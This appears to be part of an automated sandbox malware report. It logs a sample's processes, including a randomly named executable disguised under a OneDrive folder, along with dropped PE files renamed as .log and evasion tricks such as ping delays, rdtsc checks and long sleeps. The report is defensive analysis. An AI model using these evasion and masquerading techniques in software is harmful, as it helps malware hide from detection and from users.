                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeMemory allocated: 1B050000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeMemory allocated: 1AF20000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeMemory allocated: 18E0000 memory reserve | memory write watch
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeMemory allocated: 1B250000 memory reserve | memory write watch
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeMemory allocated: 17A0000 memory reserve | memory write watch
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeMemory allocated: 1B100000 memory reserve | memory write watch
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9BC834C9 rdtsc 7_2_00007FFD9BC834C9
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BAE1B58 sldt word ptr [eax]29_2_00007FFD9BAE1B58
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\omJXhfZJ.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\AOsWDEPp.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\KxLmnhVX.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\yEVVDmkp.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\kikGqNQT.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\DzXmKSai.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\yVcnRIer.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\uWPwaYLB.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\YTwAzGpt.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\KpbTIyuS.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\cBDZcTPh.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZLNiVXPn.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\JsALnyfX.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\rfYGTcKI.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\OnCcudVQ.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\fDqHyDTc.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\DIumuEtf.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\pixyxcvN.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\scAOpcZD.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\WahSOJEu.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\wTqFwYZw.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\PkdkPdkL.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\hxFqjzFa.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\nYbxxKQM.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\wKTFMmGz.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\azRqGkKl.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe TID: 5000Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe TID: 1888Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe TID: 4336Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe TID: 3492Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeFile Volume queried: C:\ FullSizeInformation
